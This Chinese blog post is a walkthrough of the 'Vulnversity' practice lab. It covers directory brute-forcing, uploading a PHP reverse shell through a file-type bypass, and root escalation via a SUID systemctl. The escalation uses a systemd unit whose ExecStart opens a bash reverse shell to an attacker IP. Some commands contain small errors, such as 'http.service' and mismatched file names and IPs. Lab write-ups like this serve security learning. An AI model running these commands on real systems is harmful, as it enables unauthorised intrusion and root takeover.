SugarCrash!

记录学习,想找个师傅带带我

0%

Vulnversity

Vulnversity

了解主动侦察、Web 应用程序攻击和权限提升。

端口情况

![[Pasted image 20220515105923.png]]

访问3333端口

![[Pasted image 20220515110027.png]]

GoBuster扫目录

GoBuster 是一种用于暴力破解 URI(目录和文件)、DNS子域和虚拟主机名的工具。对于这台机器,我们将专注于使用它来暴力破解目录。

1
gobuster dir -u http://10.10.20.174:3333 -w /usr/share/wordlists/dirb/common.txt
上传目录

/internal
用burpsuite fuzz一下上传类型
.phtml可以上传

php shell

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
![[Pasted image 20220515111913.png]]
![[Pasted image 20220515111927.png]]

获得shell

![[Pasted image 20220515112744.png]]

提权

告诉我们了是Suid提权
find / -user root -perm -4000 -exec ls -ldb {} \;
寻找提权项
在提权辅助页

https://gtfobins.github.io/#+suid

找到了systemctl
开始提权
systemctl–suid提权
先在kali机上创建一个反弹shell的a.service

1
2
3
4
5
[Service]
Type=oneshot
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/10.13.40.87/7777 0>&1"
[Install]
WantedBy=multi-user.target

systemctl提权的时候最好是在==/dev/shm==目录下,因为通常情况下unit是放在
/usr/lib/systemd/system/
/etc/systemd/system/
渗透情况下这两个目录都不可写

1
2
3
4
5
6
7
8
9
10
python -m http.service 9001
wget 10.10.40.87:9001/a.service
systemctl link /dev/shm/mm.service

kali机监听
nc -lvnp 7777

systemctl enable --now /dev/shm/mm.service

root权限就有了

![[Pasted image 20220515120403.png]]